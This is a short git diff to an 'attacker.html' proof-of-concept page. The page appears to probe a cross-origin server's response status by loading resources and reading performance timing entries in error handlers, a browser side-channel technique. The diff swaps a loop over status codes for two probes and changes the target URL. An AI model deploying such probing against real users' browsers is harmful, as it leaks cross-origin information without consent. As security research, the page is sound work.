--- a/src/poc/attacker.html
+++ b/src/poc/attacker.html
@@ -8,7 +8,11 @@
       sound.src = `${url}?status=${status}`;
 
       return new Promise((resolve) => {
+        sound.onload = () => {
+          console.log('onload');
+        }
         sound.onerror = () => {
+          console.log('onerror');
           let entries = performance.getEntries();
           let end = entries.length;
           //console.log(entries);
@@ -19,13 +23,12 @@
     }
 
     async function run(url) {
-      for (let i = 100; i < 600; i++) {
-        document.body.innerHTML += `${i} ${await get_diff(url, i)}<br>`;
-      }
+      get_diff(url);
+      get_diff(url + '/does_not_exist');
     }
     
     onload = () => {
-      run('http://ibgang.com:8880/static/robots.txt');
+      run('http://ibgang.com:8880/');
     }
   </script>
 </head>
